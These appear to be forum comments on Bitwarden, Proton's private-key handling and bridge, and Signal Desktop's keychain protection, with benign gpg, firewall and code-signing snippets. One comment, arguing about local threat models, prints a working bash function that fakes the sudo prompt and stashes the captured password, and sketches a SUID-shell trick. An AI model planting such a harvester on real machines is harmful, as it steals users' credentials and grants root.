The Bitwarden client keeps all the data cached, so the server can be down (or your internet connection) and you still have access to your passwords.
You upload your private key to the cloud. Encrypted or not, this is a bad idea.
An encrypted key is a useless blob. What matters is the key that decrypts that blob, which is your password (or a key derived from it, I assume), and that stays client-side.
They can do the signing and encryption with my public key
They can't sign with your public key. Signing is done with your private key; the public key is what everyone else uses to verify the signature.
Either way:
and then I’ll do the decryption with my own private key locally without them storing it.
You can do it using the bridge, exactly like you would with any client-side tooling.
Shouldn't we worry about enshittification when we are on the verge of, or already on the descending side of, the trajectory?
So far they have added features in a way that keeps respecting users' rights, without changing their business model (which is 90% of the reason why companies enshittify, BTW). Just because these products have something in common with products of companies that enshittified doesn't mean the same applies here.
You can use your own GPG key (https://proton.me/support/importing-openpgp-private-key, or via the bridge). Whatever tool does the signing needs the key (duh), so I am not sure what you mean by "they store your private key" (they store it encrypted, as per the documentation: https://proton.me/support/how-is-the-private-key-stored). Their AI was specifically designed to run locally, exactly to be privacy friendly, and it's a feature that can be disabled (once it reaches general subscriptions).
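For reference, what you import per that support page is just the ASCII-armored export of your existing key; a minimal sketch with gpg (the email address identifying the key is a made-up example):

```bash
# Export your existing private key as an armored file, ready to be imported into Proton
gpg --export-secret-keys --armor you@example.com > mykey.asc
```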
I don't care about cryptocurrencies, but I suppose they started with the most popular ones; it has nothing to do with privacy, as they just let you store your currencies.
Anyway, use what you like the most, of course, but your motivations don't look very solid and include quite a lot of incorrect information; I hope you didn't make your decision based on it.
I guess the answer would be "but I have a job already"...
Yes, you could run it LAN-only. You could also restrict access to VPN only.
Obviously this adds friction in addition to security, but if that's fine with you, you can.
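As a rough sketch of what that could look like on a Linux host using ufw (the subnet, port, and WireGuard interface name below are assumptions; adapt them to your setup):

```bash
# Drop unsolicited inbound traffic by default (make sure SSH/anything else you need is allowed first)
sudo ufw default deny incoming
# LAN-only: allow the web vault (HTTPS here) only from the local network
sudo ufw allow from 192.168.1.0/24 to any port 443 proto tcp
# VPN-only alternative: allow it only on the VPN interface (e.g. WireGuard's wg0)
sudo ufw allow in on wg0 to any port 443 proto tcp
sudo ufw enable
```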
Thanks for the heads-up!
I think this is a very real observation, and there isn't much that can be done about it.
The best non-USA people can do is to participate and share/produce content which is not US-centric (ideally in their native language too). Unfortunately many communities, even non political ones, often still default to a US-centric perspective and culture, which makes it hard for people to participate.
It's hard to dance around it: more people are needed.
I am not proposing anything, actually; I am saying that this change won't modify the threat model in any substantial way. Your comment implied that it kind of did, by requiring root access - which is a slightly different threat model, though not so much on single-user machines.
So my point is that "the data is safe as long as your user password is safe" is a very small change compared to "your data is safe as long as your device is safe". There are tons of ways to get the password once you have local access, and what I strongly disagree with is the idea that it requires much more work or risk. A fake sudo prompt requires a 10-line bash script, for example, since you control the shell configuration. And you don't even need to phish: you can simply get a SUID shell by sneaking a "chmod +s" on a shell binary into any local configuration or script that the user runs with sudo, and you are root; or you dump the keyring, or... etc. Likewise, 99.9% of users don't run integrity monitoring tools or monitor and restrict egress, so these attacks simply won't be noticed.
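To give an idea of how trivial that is, here is a minimal sketch of such a fake prompt, assuming bash (the stash path is made up); it only needs to be appended to something like ~/.bashrc, which the attacker already controls:

```bash
# Shadow the real sudo with a shell function
sudo() {
    # Prompt exactly like the real sudo would
    read -r -s -p "[sudo] password for $USER: " pw; echo
    # Stash the captured password somewhere the attacker can collect it later
    printf '%s\n' "$pw" >> /tmp/.cache_pw
    # Forward the password to the real sudo so the command still works as expected
    printf '%s\n' "$pw" | command sudo -S "$@"
}
```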
So what I am saying is that encrypted storage for the key is better than plaintext storage, but if this required substantial energy from the devs that could have been put into work that substantially improves the security posture, it is a net negative in terms of security (I don't know whether that is the case), and that after this change nobody should feel secure about their Signal data if their device gets compromised.
You don't need root (or a memory dump). You need the user password, or to control the binary; both are relatively easy to get if you have user access. For example, change an environment variable to point to a patched binary first, spoof the password prompt, and then continue execution as the normal binary would.
I am saying that based on the existing risks, effort should be put on the most relevant ones for the threat model you intend to assume.
In fact the "fix" that they are providing is not changing much, simply because on single-user machines there is borderline no difference between compromising your user (i.e., physical access, you installing malware unknowingly etc.) and compromising the whole box (with root/admin access).
On Windows it's not going to have any impact at all (due to how this API is implemented); on Linux/Mac it adds a little complexity to the exploit. Once your user is compromised, your password (which is what protects the keychain) is going to be compromised very easily via internal phishing (e.g., a fake graphical prompt, a fake sudo prompt, etc.) or other techniques. Sometimes it might not even be necessary: for example, if you run signal-desktop yourself and you own the binary, an attacker with local privileges can simply patch/modify/replace the binary. So then you need other controls, like signing the binary and configuring accepted keys (this is possible and somewhat common on Mac), or something that relies on external trust anyway (root user, remote server, etc.).
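For what it's worth, on macOS that kind of binary-trust check can be done with the built-in tooling; a quick sketch, assuming Signal Desktop is installed at /Applications/Signal.app:

```bash
# Verify the code signature of the installed app bundle
codesign --verify --deep --strict /Applications/Signal.app && echo "signature OK"
# Show which identity/team the bundle was signed with
codesign -d --verbose=2 /Applications/Signal.app
# Ask Gatekeeper for its assessment of the app
spctl --assess --type execute --verbose /Applications/Signal.app
```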
So my point is: if their threat model already assumed that once your client device is compromised your data is not protected, it doesn't make much sense to reduce the risk of that by 10-20%; it would be better to focus on other work that might be more impactful.
It's not "insecure", it's simply a supply chain risk. You have the same exact problem with any client software that you might use. There are still jurisdictions, there are still supply chain attacks. The posture is different simply by a small tradeoff: business incentive and size for proton as pluses vs quicker updates (via JS code) and slower updates vs worse security and dependency on a handful of individuals in case of other tools.
Any software that performs the crypto operations can do stuff with the keys if it is compromised or coerced by law enforcement to do so.
In any case, if this tradeoff doesn't suit you, the bridge allows you to use your preferred tool, so this is kind of a moot point.
The main argument for me is that if you rely on email and GPG to avoid getting caught by those who can coerce Proton, you are already failing.